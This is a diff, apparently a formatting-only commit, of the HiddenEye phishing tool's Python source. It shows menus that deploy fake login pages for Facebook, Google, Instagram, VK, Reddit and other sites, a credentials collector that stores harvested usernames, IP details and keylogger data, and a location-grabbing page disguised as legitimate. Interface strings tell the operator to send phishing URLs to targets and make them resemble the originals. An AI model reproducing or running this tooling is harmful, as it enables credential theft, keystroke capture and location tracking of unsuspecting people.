print_sorted_as_menu(
|
||||
localization.lang_start_main_menu["google_operation_modes"]
|
||||
)
|
||||
localization.lang_start_main_menu["google_operation_modes"])
|
||||
customOption = input(global_localization.input_line)
|
||||
start_phishing_page("Google", customOption)
|
||||
elif option == "03":
|
||||
|
@ -80,8 +80,7 @@ def start_main_menu():
|
|||
module_loading_message("Instagram")
|
||||
print(localization.lang_start_main_menu["operation_mode"])
|
||||
print_sorted_as_menu(
|
||||
localization.lang_start_main_menu["instagram_operation_modes"]
|
||||
)
|
||||
localization.lang_start_main_menu["instagram_operation_modes"])
|
||||
customOption = input(global_localization.input_line)
|
||||
start_phishing_page("Instagram", customOption)
|
||||
elif option == "09":
|
||||
|
@ -107,7 +106,8 @@ def start_main_menu():
|
|||
elif option == "14":
|
||||
module_loading_message("VK")
|
||||
print(localization.lang_start_main_menu["operation_mode"])
|
||||
print_sorted_as_menu(localization.lang_start_main_menu["VK_operation_modes"])
|
||||
print_sorted_as_menu(
|
||||
localization.lang_start_main_menu["VK_operation_modes"])
|
||||
customOption = input(global_localization.input_line)
|
||||
start_phishing_page("VK", customOption)
|
||||
elif option == "15":
|
||||
|
@ -194,8 +194,7 @@ def start_main_menu():
|
|||
module_loading_message("Reddit")
|
||||
print(localization.lang_start_main_menu["operation_mode"])
|
||||
print_sorted_as_menu(
|
||||
localization.lang_start_main_menu["reddit_operation_modes"]
|
||||
)
|
||||
localization.lang_start_main_menu["reddit_operation_modes"])
|
||||
customOption = input(global_localization.input_line)
|
||||
start_phishing_page("Reddit", customOption)
|
||||
elif option == "36":
|
||||
|
@ -218,17 +217,14 @@ def start_main_menu():
|
|||
module_loading_message("CUSTOM(2)")
|
||||
customOption = ""
|
||||
start_phishing_page("CUSTOM(2)", customOption)
|
||||
|
||||
"""PHISHING MODULES BELOW"""
|
||||
|
||||
elif option == "0A":
|
||||
module_loading_message("LOCATION")
|
||||
print(localization.lang_start_main_menu["operation_mode"])
|
||||
print_sorted_as_menu(
|
||||
localization.lang_start_main_menu[
|
||||
"additional_module_location_operation_modes"
|
||||
]
|
||||
)
|
||||
localization.
|
||||
lang_start_main_menu["additional_module_location_operation_modes"])
|
||||
customOption = input(global_localization.input_line)
|
||||
start_phishing_page("LOCATION", customOption)
|
||||
|
||||
|
@ -350,40 +346,24 @@ def start_phishing_page(page, custom_option): # Phishing pages selection menu
|
|||
elif page == "Xbox":
|
||||
webpage_set("WebPages/xbox/", "Server/www/")
|
||||
elif page == "CUSTOM(1)":
|
||||
print(localization.lang_start_phishing_page["custom_folder_directory"].
|
||||
format(page=page))
|
||||
print(
|
||||
localization.lang_start_phishing_page["custom_folder_directory"].format(
|
||||
page=page
|
||||
)
|
||||
)
|
||||
print(
|
||||
localization.lang_start_phishing_page["manual_reading_suggestion"].format(
|
||||
page=page
|
||||
)
|
||||
)
|
||||
input(
|
||||
localization.lang_start_phishing_page[
|
||||
"press_enter_to_continue_if_setup_correctly"
|
||||
]
|
||||
)
|
||||
localization.lang_start_phishing_page["manual_reading_suggestion"].
|
||||
format(page=page))
|
||||
input(localization.lang_start_phishing_page[
|
||||
"press_enter_to_continue_if_setup_correctly"])
|
||||
print(localization.lang_start_phishing_page["copying_your_files"])
|
||||
wait(3)
|
||||
webpage_set("WebPages/CUSTOM(1)/", "Server/www/")
|
||||
elif page == "CUSTOM(2)":
|
||||
print(localization.lang_start_phishing_page["custom_folder_directory"].
|
||||
format(page=page))
|
||||
print(
|
||||
localization.lang_start_phishing_page["custom_folder_directory"].format(
|
||||
page=page
|
||||
)
|
||||
)
|
||||
print(
|
||||
localization.lang_start_phishing_page["manual_reading_suggestion"].format(
|
||||
page=page
|
||||
)
|
||||
)
|
||||
input(
|
||||
localization.lang_start_phishing_page[
|
||||
"press_enter_to_continue_if_setup_correctly"
|
||||
]
|
||||
)
|
||||
localization.lang_start_phishing_page["manual_reading_suggestion"].
|
||||
format(page=page))
|
||||
input(localization.lang_start_phishing_page[
|
||||
"press_enter_to_continue_if_setup_correctly"])
|
||||
print(localization.lang_start_phishing_page["copying_your_files"])
|
||||
wait(3)
|
||||
webpage_set("WebPages/CUSTOM(2)/", "Server/www/")
|
||||
|
@ -393,21 +373,15 @@ def start_phishing_page(page, custom_option): # Phishing pages selection menu
|
|||
wait(3)
|
||||
webpage_set("WebPages/TOOLS/nearyou", "Server/www/")
|
||||
print(localization.lang_start_phishing_page["https_suggestion"])
|
||||
input(
|
||||
localization.lang_start_phishing_page[
|
||||
"press_enter_to_continue_if_setup_correctly"
|
||||
]
|
||||
)
|
||||
input(localization.lang_start_phishing_page[
|
||||
"press_enter_to_continue_if_setup_correctly"])
|
||||
elif custom_option == "2" and page == "LOCATION":
|
||||
wait(3)
|
||||
webpage_set("WebPages/TOOLS/gdrive", "Server/www/")
|
||||
print(localization.lang_start_phishing_page["https_suggestion"])
|
||||
print(localization.lang_start_phishing_page["gdrive_suggestion"])
|
||||
input(
|
||||
localization.lang_start_phishing_page[
|
||||
"press_enter_to_continue_if_setup_correctly"
|
||||
]
|
||||
)
|
||||
input(localization.lang_start_phishing_page[
|
||||
"press_enter_to_continue_if_setup_correctly"])
|
||||
|
||||
else:
|
||||
run_command("clear")
|
||||
|
@ -416,18 +390,18 @@ def start_phishing_page(page, custom_option): # Phishing pages selection menu
|
|||
start_main_menu()
|
||||
|
||||
|
||||
def enter_custom_redirecting_url(): # Question where user can input custom web-link
|
||||
def enter_custom_redirecting_url(
|
||||
): # Question where user can input custom web-link
|
||||
run_command("clear")
|
||||
print(global_localization.hidden_eye_logo)
|
||||
print(global_localization.official_website_link)
|
||||
print(global_localization.by_darksec)
|
||||
print(
|
||||
localization.lang_enter_custom_redirecting_url["enter_redirecting_url_header"]
|
||||
)
|
||||
print(
|
||||
localization.lang_enter_custom_redirecting_url["enter_redirecting_url_prompt"]
|
||||
)
|
||||
custom = input(localization.lang_enter_custom_redirecting_url["redirect_here"])
|
||||
print(localization.
|
||||
lang_enter_custom_redirecting_url["enter_redirecting_url_header"])
|
||||
print(localization.
|
||||
lang_enter_custom_redirecting_url["enter_redirecting_url_prompt"])
|
||||
custom = input(
|
||||
localization.lang_enter_custom_redirecting_url["redirect_here"])
|
||||
if "http://" in custom or "https://" in custom:
|
||||
pass
|
||||
else:
|
||||
|
@ -442,7 +416,8 @@ def enter_custom_redirecting_url(): # Question where user can input custom web-
|
|||
f.write(c)
|
||||
f.close()
|
||||
|
||||
if path.exists("Server/www/post.php") and path.exists("Server/www/login.php"):
|
||||
if path.exists("Server/www/post.php") and path.exists(
|
||||
"Server/www/login.php"):
|
||||
with open("Server/www/login.php") as f:
|
||||
read_data = f.read()
|
||||
c = read_data.replace("<CUSTOM>", custom)
|
||||
|
|
|
@ -71,10 +71,12 @@ def exit_message(port=80): # Message when HiddenEye exit
|
|||
run_command("clear")
|
||||
print(global_localization.hidden_eye_logo)
|
||||
print(" " + global_localization.by_darksec)
|
||||
print(" " + global_localization.official_website_link)
|
||||
print(" " +
|
||||
global_localization.official_website_link)
|
||||
print(localization.lang_exit_message["help_to_improve_this_tool"])
|
||||
print(localization.lang_exit_message["tell_if_page_got_broken"])
|
||||
print(localization.lang_exit_message["make_your_pull_request_or_issue"])
|
||||
print(
|
||||
localization.lang_exit_message["make_your_pull_request_or_issue"])
|
||||
print(localization.lang_exit_message["small_disclaimer_suggestion"])
|
||||
print(localization.lang_exit_message["forum_suggestion"])
|
||||
print(localization.lang_exit_message["financial_support"])
|
||||
|
@ -94,15 +96,16 @@ def terms_of_service_message():
|
|||
if not agreement:
|
||||
print(localization.lang_terms_of_service_message["GPL_3.0"])
|
||||
print(
|
||||
localization.lang_terms_of_service_message[
|
||||
"great_power_great_responsibility"
|
||||
]
|
||||
)
|
||||
print(localization.lang_terms_of_service_message["do_you_accept_license"])
|
||||
print(localization.lang_terms_of_service_message["enter_this_to_confirm"])
|
||||
localization.
|
||||
lang_terms_of_service_message["great_power_great_responsibility"])
|
||||
print(localization.
|
||||
lang_terms_of_service_message["do_you_accept_license"])
|
||||
print(localization.
|
||||
lang_terms_of_service_message["enter_this_to_confirm"])
|
||||
agreement = input(global_localization.input_line)
|
||||
if localization.text_to_confirm_license not in agreement:
|
||||
print(localization.lang_terms_of_service_message["you_are_not_allowed"])
|
||||
print(localization.
|
||||
lang_terms_of_service_message["you_are_not_allowed"])
|
||||
exit()
|
||||
else:
|
||||
eula = open("eula.txt", "w")
|
||||
|
@ -126,14 +129,14 @@ def credentials_collector():
|
|||
with open("Server/www/usernames.txt") as creds:
|
||||
lines = creds.read().rstrip()
|
||||
if len(lines) != 0:
|
||||
log_writer(
|
||||
localization.lang_credentials_collector["credentials_found"]
|
||||
+ "{0}{2}{1}".format(default_palette[2], default_palette[3], lines)
|
||||
)
|
||||
log_writer(localization.
|
||||
lang_credentials_collector["credentials_found"] +
|
||||
"{0}{2}{1}".format(default_palette[2],
|
||||
default_palette[3], lines))
|
||||
pathlib_Path("Server/CapturedData/usernames.txt").touch(
|
||||
mode=0o777, exist_ok=True
|
||||
)
|
||||
captured_usernames = open("Server/CapturedData/usernames.txt", "a")
|
||||
mode=0o777, exist_ok=True)
|
||||
captured_usernames = open("Server/CapturedData/usernames.txt",
|
||||
"a")
|
||||
new_usernames = open("Server/www/usernames.txt")
|
||||
captured_usernames.write(new_usernames.read())
|
||||
new_usernames.close()
|
||||
|
@ -150,13 +153,12 @@ def credentials_collector():
|
|||
with open("Server/www/ip.txt") as creds:
|
||||
lines = creds.read().rstrip()
|
||||
if len(lines) != 0:
|
||||
log_writer(
|
||||
localization.lang_credentials_collector["device_details_found"]
|
||||
+ "{0}{2}{1}".format(default_palette[2], default_palette[3], lines)
|
||||
)
|
||||
pathlib_Path("Server/CapturedData/ip.txt").touch(
|
||||
mode=0o777, exist_ok=True
|
||||
)
|
||||
log_writer(localization.
|
||||
lang_credentials_collector["device_details_found"] +
|
||||
"{0}{2}{1}".format(default_palette[2],
|
||||
default_palette[3], lines))
|
||||
pathlib_Path("Server/CapturedData/ip.txt").touch(mode=0o777,
|
||||
exist_ok=True)
|
||||
captured_ips = open("Server/CapturedData/ip.txt", "a")
|
||||
new_ips = open("Server/www/ip.txt")
|
||||
captured_ips.write(new_ips.read())
|
||||
|
@ -176,14 +178,14 @@ def credentials_collector():
|
|||
lines = creds.read().rstrip()
|
||||
if len(lines) != 0:
|
||||
log_writer(global_localization.line_of_dots)
|
||||
log_writer(
|
||||
localization.lang_credentials_collector["getting_pressed_keys"]
|
||||
+ "{0}{2}{1}".format(default_palette[2], default_palette[3], lines)
|
||||
)
|
||||
log_writer(localization.
|
||||
lang_credentials_collector["getting_pressed_keys"] +
|
||||
"{0}{2}{1}".format(default_palette[2],
|
||||
default_palette[3], lines))
|
||||
pathlib_Path("Server/CapturedData/KeyloggerData.txt").touch(
|
||||
mode=0o777, exist_ok=True
|
||||
)
|
||||
captured_keys = open("Server/CapturedData/KeyloggerData.txt", "a")
|
||||
mode=0o777, exist_ok=True)
|
||||
captured_keys = open("Server/CapturedData/KeyloggerData.txt",
|
||||
"a")
|
||||
new_keys = open("Server/www/KeyloggerData.txt")
|
||||
captured_keys.write(new_keys.read())
|
||||
new_keys.close()
|
||||
|
@ -209,13 +211,9 @@ def log_writer(ctx): # Writing log
|
|||
"""
|
||||
logFile = open("log.txt", "w")
|
||||
logFile.write(
|
||||
ctx.replace(default_palette[0], "")
|
||||
.replace(default_palette[1], "")
|
||||
.replace(default_palette[2], "")
|
||||
.replace(default_palette[3], "")
|
||||
.replace(default_palette[4], "")
|
||||
+ "\n"
|
||||
)
|
||||
ctx.replace(default_palette[0], "").replace(
|
||||
default_palette[1], "").replace(default_palette[2], "").replace(
|
||||
default_palette[3], "").replace(default_palette[4], "") + "\n")
|
||||
print(ctx)
|
||||
|
||||
|
||||
|
@ -263,7 +261,8 @@ def global_message():
|
|||
print(global_localization.line_of_dots)
|
||||
|
||||
|
||||
def verify_connection(host="https://dark-sec-official.com"): # Connection check
|
||||
def verify_connection(
|
||||
host="https://dark-sec-official.com"): # Connection check
|
||||
run_command("clear")
|
||||
try:
|
||||
req = requests.get(host, timeout=25)
|
||||
|
|
|
@ -21,22 +21,24 @@ def check_version(): # WILL BE MOVED FROM HERE
|
|||
version = check_version()
|
||||
|
||||
lang_start_main_menu = {
|
||||
"version_by_darksec": _(
|
||||
" {2}[{0}v {3}{2}]{0} BY:DARKSEC{1}"
|
||||
).format(default_palette[4], default_palette[2], default_palette[0], version),
|
||||
"short_description": _(
|
||||
"{1}[{0} Modern Phishing Tool With Advanced Functionality {1}]"
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"features_summary": _(
|
||||
"{1}[{0} PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING {1}]"
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"down_line": "{0}________________________________________________________________________________".format(
|
||||
default_palette[0]
|
||||
),
|
||||
"attack_vector_message": _(
|
||||
"------------------------\nSELECT ANY ATTACK VECTOR:\n------------------------"
|
||||
),
|
||||
"phishing_modules_header": _("\n{0}PHISHING-MODULES:").format(default_palette[0]),
|
||||
"version_by_darksec":
|
||||
_(" {2}[{0}v {3}{2}]{0} BY:DARKSEC{1}"
|
||||
).format(default_palette[4], default_palette[2], default_palette[0],
|
||||
version),
|
||||
"short_description":
|
||||
_("{1}[{0} Modern Phishing Tool With Advanced Functionality {1}]").format(
|
||||
default_palette[2], default_palette[0]),
|
||||
"features_summary":
|
||||
_("{1}[{0} PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING {1}]"
|
||||
).format(default_palette[2], default_palette[0]),
|
||||
"down_line":
|
||||
"{0}________________________________________________________________________________"
|
||||
.format(default_palette[0]),
|
||||
"attack_vector_message":
|
||||
_("------------------------\nSELECT ANY ATTACK VECTOR:\n------------------------"
|
||||
),
|
||||
"phishing_modules_header":
|
||||
_("\n{0}PHISHING-MODULES:").format(default_palette[0]),
|
||||
"phishing_modules_list": [
|
||||
[
|
||||
"{0}[{1}01{0}]{1} Facebook",
|
||||
|
@ -87,7 +89,10 @@ lang_start_main_menu = {
|
|||
"{0}[{1}21{0}]{1} Spotify",
|
||||
"{0}[{1}33{0}]{1} Verizon",
|
||||
],
|
||||
["{0}[{1}10{0}]{1} Yahoo", "{0}[{1}22{0}]{1} Quora", "{0}[{1}34{0}]{1} Yandex"],
|
||||
[
|
||||
"{0}[{1}10{0}]{1} Yahoo", "{0}[{1}22{0}]{1} Quora",
|
||||
"{0}[{1}34{0}]{1} Yandex"
|
||||
],
|
||||
[
|
||||
"{0}[{1}11{0}]{1} Twitch",
|
||||
"{0}[{1}23{0}]{1} PornHub",
|
||||
|
@ -99,21 +104,22 @@ lang_start_main_menu = {
|
|||
"{0}[{1}36{0}]{1} Subito.it",
|
||||
],
|
||||
],
|
||||
"additional_modules": _("\n{0}ADDITIONAL-TOOLS:").format(default_palette[0]),
|
||||
"additional_modules":
|
||||
_("\n{0}ADDITIONAL-TOOLS:").format(default_palette[0]),
|
||||
"additional_modules_list": [[_("{0}[{1}0A{0}]{1} Get Target Location")]],
|
||||
"operation_mode": _("\nOperation mode:\n"),
|
||||
"operation_mode":
|
||||
_("\nOperation mode:\n"),
|
||||
"facebook_operation_modes": [
|
||||
[
|
||||
_("{0}[{1}1{0}]{1} Standard Page Phishing"),
|
||||
_("{0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode)"),
|
||||
_("{0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode)"
|
||||
),
|
||||
],
|
||||
[
|
||||
_(
|
||||
"{0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)"
|
||||
),
|
||||
_(
|
||||
"{0}[{1}4{0}]{1} Facebook Phishing-Messenger Credentials(messenger_mode)"
|
||||
),
|
||||
_("{0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)"
|
||||
),
|
||||
_("{0}[{1}4{0}]{1} Facebook Phishing-Messenger Credentials(messenger_mode)"
|
||||
),
|
||||
],
|
||||
],
|
||||
"google_operation_modes": [
|
||||
|
@ -126,69 +132,64 @@ lang_start_main_menu = {
|
|||
"instagram_operation_modes": [
|
||||
[
|
||||
_("{0}[{1}1{0}]{1} Standard Instagram Web Page Phishing"),
|
||||
_(
|
||||
"{0}[{1}4{0}]{1} Instagram Verified Badge Attack (Lure To Get Blue Badge)"
|
||||
),
|
||||
_("{0}[{1}4{0}]{1} Instagram Verified Badge Attack (Lure To Get Blue Badge)"
|
||||
),
|
||||
],
|
||||
[
|
||||
_("{0}[{1}2{0}]{1} Instagram Autoliker Phishing (To Lure The Users)"),
|
||||
_("{0}[{1}2{0}]{1} Instagram Autoliker Phishing (To Lure The Users)"
|
||||
),
|
||||
_("{0}[{1}5{0}]{1} Instafollower (Lure To Get More Followers)"),
|
||||
],
|
||||
[
|
||||
_(
|
||||
"{0}[{1}3{0}]{1} Instagram Advanced Scenario (Appears as Instagram Profile)"
|
||||
)
|
||||
_("{0}[{1}3{0}]{1} Instagram Advanced Scenario (Appears as Instagram Profile)"
|
||||
)
|
||||
],
|
||||
],
|
||||
"VK_operation_modes": [
|
||||
[
|
||||
_("{0}[{1}1{0}]{1} Standard VK Web Page Phishing"),
|
||||
_("{0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)"),
|
||||
]
|
||||
],
|
||||
"reddit_operation_modes": [
|
||||
[_("{0}[{1}1{0}]{1} New reddit page"), _("{0}[{1}2{0}]{1} Old reddit page")]
|
||||
],
|
||||
"additional_module_location_operation_modes": [
|
||||
[
|
||||
_("{0}[{1}1{0}]{1} NEAR YOU (Webpage Looks Like Legitimate)"),
|
||||
_(
|
||||
"{0}[{1}2{0}]{1} GDRIVE (Asks For Location Permission To redirect GDRIVE)"
|
||||
),
|
||||
]
|
||||
],
|
||||
"VK_operation_modes": [[
|
||||
_("{0}[{1}1{0}]{1} Standard VK Web Page Phishing"),
|
||||
_("{0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)"),
|
||||
]],
|
||||
"reddit_operation_modes": [[
|
||||
_("{0}[{1}1{0}]{1} New reddit page"),
|
||||
_("{0}[{1}2{0}]{1} Old reddit page")
|
||||
]],
|
||||
"additional_module_location_operation_modes": [[
|
||||
_("{0}[{1}1{0}]{1} NEAR YOU (Webpage Looks Like Legitimate)"),
|
||||
_("{0}[{1}2{0}]{1} GDRIVE (Asks For Location Permission To redirect GDRIVE)"
|
||||
),
|
||||
]],
|
||||
}
|
||||
lang_start_phishing_page = {
|
||||
"custom_folder_directory": _(
|
||||
"\n {0}[{1}*{0}]{1} Custom Folder Directory is {0}WebPages/{page}"
|
||||
).format(default_palette[0], default_palette[4], page="page"),
|
||||
"manual_reading_suggestion": _(
|
||||
"\n {0}[{1}*{0}]{1} Please Read The manual.txt File Available At {0}[WebPages/{page}]"
|
||||
).format(default_palette[0], default_palette[4], page="page"),
|
||||
"press_enter_to_continue_if_setup_correctly": _(
|
||||
"\n {0}[{1}*{0}]{1} If You Have Set Up The Files Correctly, {0}Press Enter To continue."
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
"copying_your_files": _(
|
||||
"\n {0}[{1}*{0}]{1} Copying Your Files To Server/www Folder..."
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
"https_suggestion": _(
|
||||
"\n{0}[{1}*{0}]{1} PLEASE USE TUNNELS/URL WITH '{0}https{1}' \n{0}[{1}*{0}]{1} Browsers Trusts only Https Links To Share Location\n"
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
"gdrive_suggestion": _(
|
||||
"{0}[{1}*{0}]{1} {0}Tip: {1}Use Google Drive File Url as Custom Url while asked."
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
"custom_folder_directory":
|
||||
_("\n {0}[{1}*{0}]{1} Custom Folder Directory is {0}WebPages/{page}").
|
||||
format(default_palette[0], default_palette[4], page="page"),
|
||||
"manual_reading_suggestion":
|
||||
_("\n {0}[{1}*{0}]{1} Please Read The manual.txt File Available At {0}[WebPages/{page}]"
|
||||
).format(default_palette[0], default_palette[4], page="page"),
|
||||
"press_enter_to_continue_if_setup_correctly":
|
||||
_("\n {0}[{1}*{0}]{1} If You Have Set Up The Files Correctly, {0}Press Enter To continue."
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
"copying_your_files":
|
||||
_("\n {0}[{1}*{0}]{1} Copying Your Files To Server/www Folder...").format(
|
||||
default_palette[0], default_palette[4]),
|
||||
"https_suggestion":
|
||||
_("\n{0}[{1}*{0}]{1} PLEASE USE TUNNELS/URL WITH '{0}https{1}' \n{0}[{1}*{0}]{1} Browsers Trusts only Https Links To Share Location\n"
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
"gdrive_suggestion":
|
||||
_("{0}[{1}*{0}]{1} {0}Tip: {1}Use Google Drive File Url as Custom Url while asked."
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
}
|
||||
|
||||
lang_enter_custom_redirecting_url = {
|
||||
"enter_redirecting_url_header": _(
|
||||
"{0}\n-------------------------------\n{1}[ PUT YOUR REDIRECTING URL HERE ] {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"enter_redirecting_url_prompt": _(
|
||||
"\n{0}[{1}*{0}]Insert a custom redirect url:"
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
"redirect_here": _("\n{0}REDIRECT HERE>>> {1}").format(
|
||||
default_palette[0], default_palette[2]
|
||||
),
|
||||
"enter_redirecting_url_header":
|
||||
_("{0}\n-------------------------------\n{1}[ PUT YOUR REDIRECTING URL HERE ] {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"enter_redirecting_url_prompt":
|
||||
_("\n{0}[{1}*{0}]Insert a custom redirect url:").format(
|
||||
default_palette[0], default_palette[4]),
|
||||
"redirect_here":
|
||||
_("\n{0}REDIRECT HERE>>> {1}").format(default_palette[0],
|
||||
default_palette[2]),
|
||||
}
|
||||
|
||||
#
|
||||
|
|
|
@ -10,97 +10,109 @@ from Defs.LocalizationManager.localization import _
|
|||
default_palette = theme.default_palette
|
||||
|
||||
lang_server_selection = {
|
||||
"server_selection": _(
|
||||
"{0}[ HOSTING SERVER SELECTION ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"select_any_available_server": _(
|
||||
"\n {0}[{1}*{0}]{0}Select Any Available Server:{1}"
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
"server_selection":
|
||||
_("{0}[ HOSTING SERVER SELECTION ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"select_any_available_server":
|
||||
_("\n {0}[{1}*{0}]{0}Select Any Available Server:{1}").format(
|
||||
default_palette[0], default_palette[4]),
|
||||
"servers_list": [
|
||||
["{0}[{1}00{0}]{1}Localhost", "{0}[{1}04{0}]{1}Localtunnel (not working now)"],
|
||||
["{0}[{1}01{0}]{1}Ngrok", "{0}[{1}05{0}]{1}OpenPort (not working now)"],
|
||||
["{0}[{1}02{0}]{1}Serveo", "{0}[{1}06{0}]{1}Pagekite (not working now)"],
|
||||
[
|
||||
"{0}[{1}00{0}]{1}Localhost",
|
||||
"{0}[{1}04{0}]{1}Localtunnel (not working now)"
|
||||
],
|
||||
[
|
||||
"{0}[{1}01{0}]{1}Ngrok",
|
||||
"{0}[{1}05{0}]{1}OpenPort (not working now)"
|
||||
],
|
||||
[
|
||||
"{0}[{1}02{0}]{1}Serveo",
|
||||
"{0}[{1}06{0}]{1}Pagekite (not working now)"
|
||||
],
|
||||
["{0}[{1}03{0}]{1}Localxpose (not working now)"],
|
||||
],
|
||||
}
|
||||
|
||||
lang_start_localhost = {
|
||||
"localhost_server": _(
|
||||
"\n{0}[ LOCALHOST SERVER ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"your_localhost_is": _("Your Localhost is "),
|
||||
"starting_server_on_addr": _("\n[*] Starting Server On Address:: {0}:{1}"),
|
||||
"running_localhost_server": _(
|
||||
"\n{0}[ RUNNING LOCALHOST SERVER ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"send_this_url_suggestion": _(
|
||||
"\n{0}[{1}!{0}]{1} SEND THIS URL TO TARGETS ON SAME NETWORK"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"localhost_url": _("\n{0}[{1}*{0}]{1} Localhost URL: {2}http://").format(
|
||||
default_palette[2], default_palette[3], default_palette[3]
|
||||
),
|
||||
"localhost_server":
|
||||
_("\n{0}[ LOCALHOST SERVER ]{1}! {0}\n-------------------------------").
|
||||
format(default_palette[0], default_palette[2]),
|
||||
"your_localhost_is":
|
||||
_("Your Localhost is "),
|
||||
"starting_server_on_addr":
|
||||
_("\n[*] Starting Server On Address:: {0}:{1}"),
|
||||
"running_localhost_server":
|
||||
_("\n{0}[ RUNNING LOCALHOST SERVER ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"send_this_url_suggestion":
|
||||
_("\n{0}[{1}!{0}]{1} SEND THIS URL TO TARGETS ON SAME NETWORK").format(
|
||||
default_palette[0], default_palette[2]),
|
||||
"localhost_url":
|
||||
_("\n{0}[{1}*{0}]{1} Localhost URL: {2}http://").format(
|
||||
default_palette[2], default_palette[3], default_palette[3]),
|
||||
}
|
||||
|
||||
lang_start_ngrok = {
|
||||
"ngrok_server": _(
|
||||
"\n{0}[ NGROK SERVER ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"send_this_url_suggestion": _(
|
||||
"\n{0}[{1}!{0}]{1} SEND THIS NGROK URL TO TARGETS"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"ngrok_url": _("\n{0}[{1}*{0}]{1} NGROK URL: {2}").format(
|
||||
default_palette[0], default_palette[2], default_palette[3]
|
||||
),
|
||||
"ngrok_server":
|
||||
_("\n{0}[ NGROK SERVER ]{1}! {0}\n-------------------------------").format(
|
||||
default_palette[0], default_palette[2]),
|
||||
"send_this_url_suggestion":
|
||||
_("\n{0}[{1}!{0}]{1} SEND THIS NGROK URL TO TARGETS").format(
|
||||
default_palette[0], default_palette[2]),
|
||||
"ngrok_url":
|
||||
_("\n{0}[{1}*{0}]{1} NGROK URL: {2}").format(default_palette[0],
|
||||
default_palette[2],
|
||||
default_palette[3]),
|
||||
}
|
||||
|
||||
lang_start_serveo = {
|
||||
"serveo_random_server": _(
|
||||
"\n{0}[ RANDOM SERVEO URL ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"serveo_custom_server": _(
|
||||
"\n{0}[ CUSTOM SERVEO URL ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"send_this_url_suggestion": _(
|
||||
"\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO TARGETS"
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
"make_url_simmilar_to_real_suggestion": _(
|
||||
"\n{0}[{1}!{0}]{1} YOU CAN MAKE YOUR URL SIMILAR TO ORIGINAL."
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
"insert_custom_subdomain": _("\n{0}Insert a custom subdomain for serveo").format(
|
||||
default_palette[0], default_palette[2]
|
||||
),
|
||||
"serveo_url": _("\n{0}[{1}*{0}]{1} SERVEO URL: {2}").format(
|
||||
default_palette[0], default_palette[4], default_palette[3]
|
||||
),
|
||||
"failed_to_get_domain": _("\n{0}FAILED TO GET THIS DOMAIN.").format(
|
||||
default_palette[0]
|
||||
),
|
||||
"suggestion_to_fix_issue": _(
|
||||
"\n{0}CUSTOM URL MAY BE NOT VALID or ALREADY OCCUPIED BY SOMEONE ELSE."
|
||||
).format(default_palette[0]),
|
||||
"you_can_try_to_select_other_domain": _(
|
||||
"\n{0}[{1}!{0}]TRY TO SELECT ANOTHER CUSTOM DOMAIN{1} (GOING BACK)..."
|
||||
).format(default_palette[0], default_palette[4]),
|
||||
"serveo_url_option_selection": _(
|
||||
"\n{0}[ SERVEO URL TYPE SELECTION ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"serveo_phishing_warning": _(
|
||||
"\n{0}[{1}!{0}]{1}Serveo Drops The Connection Whenever Detects Phishing. Be careful."
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"choose_type_of_url": _(
|
||||
"\n{0}[{1}*{0}]{0}CHOOSE SERVEO URL TYPE TO GENERATE PHISHING LINK:{1}"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"serveo_random_server":
|
||||
_("\n{0}[ RANDOM SERVEO URL ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"serveo_custom_server":
|
||||
_("\n{0}[ CUSTOM SERVEO URL ]{1}! {0}\n-------------------------------"
|
||||
).format(default_palette[0], default_palette[2]),
|
||||
"send_this_url_suggestion":
|
||||
_("\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO TARGETS").format(
|
||||
default_palette[0], default_palette[4]),
|
||||
"make_url_simmilar_to_real_suggestion":
|
||||
_("\n{0}[{1}!{0}]{1} YOU CAN MAKE YOUR URL SIMILAR TO ORIGINAL.").format(
|
||||
default_palette[0], default_palette[4]),
|
||||
"insert_custom_subdomain":
|
||||
_("\n{0}Insert a custom subdomain for serveo").format(
|
||||
default_palette[0], default_palette[2]),
|
||||
"serveo_url":
|
||||
_("\n{0}[{1}*{0}]{1} SERVEO URL: {2}").format(default_palette[0],
|
||||
default_palette[4],
|
||||
